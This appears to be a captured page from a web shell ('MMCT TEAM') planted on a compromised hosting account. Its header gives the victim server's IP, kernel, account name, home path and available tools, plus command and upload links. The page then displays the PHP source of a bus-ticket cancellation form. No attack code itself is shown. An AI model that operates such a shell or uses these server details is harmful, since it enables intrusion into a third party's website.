MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.224.63.123
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/thegloriousadventure.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/thegloriousadventure.com/cancel-ticket.php
<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Dial 4 Cab</title>
    
    <?php include "links.php";?>

</head>
<body>
    <div class="preloader">
        <div class="loader">
            <span></span>
            <span></span>
            <span></span>
            <span></span>
        </div>
    </div>

    <?php include "header.php";?>
   
    <div class="breadcrumb breadcrumb-style-one">
        <div class="container">
            <div class="col-lg-12 text-center">
                <h2 class="breadcrumb-title">Cancel Your Ticket</h2>
                <ul class="d-flex justify-content-center breadcrumb-items">
                    <li class="breadcrumb-item"><a href="index.html">Home</a></li>
                    <li class="breadcrumb-item active">Cancel Ticket</li>
                </ul>
            </div>
        </div>
    </div>
    <section id="print-ticket">
        <div class="container">
            <div class="row pt-4">
                <div class="col-lg-6">
                   <div class=" print-ticket-lft py-5">
                        <h2>CANCEL <span> TICKET</span></h2>
                        <form>
                            <div class="mb-3">
                                <label for="recipient-name" class="col-form-label">Enter Your PNR No.</label>
                                <input type="tel" class="form-control" id="recipient-name">
                            </div>
                            <div class="mb-3">
                                <label for="message-text" class="col-form-label">Enter Your Ticket No.</label>
                                <input type="tel" class="form-control" id="recipient-name">
                            </div>
                            <div class="mb-3">
                                <label for="message-text" class="col-form-label">Enter Your Email Id.</label>
                                <input type="tel" class="form-control" id="recipient-name">
                            </div>
                            <div class="modal-footer" style="padding:0; margin:0;">
                                <button type="button" class="btn w-100 m-btn">Submit</button>
                            </div>
                        </form>
                    </div>
                </div>
                <div class="col-lg-6 pt-5">
                    <div class=" print-ticket-rgt">
                        <img src="bus-img/lapi.png" class="w-100" alt="">
                   </div>
                </div>
            </div>
        </div>
    </section>
   
    <?php include "footer.php";?>
    
    <?php include "pop-up.php";?>

</body>
</html>

MMCT - 2023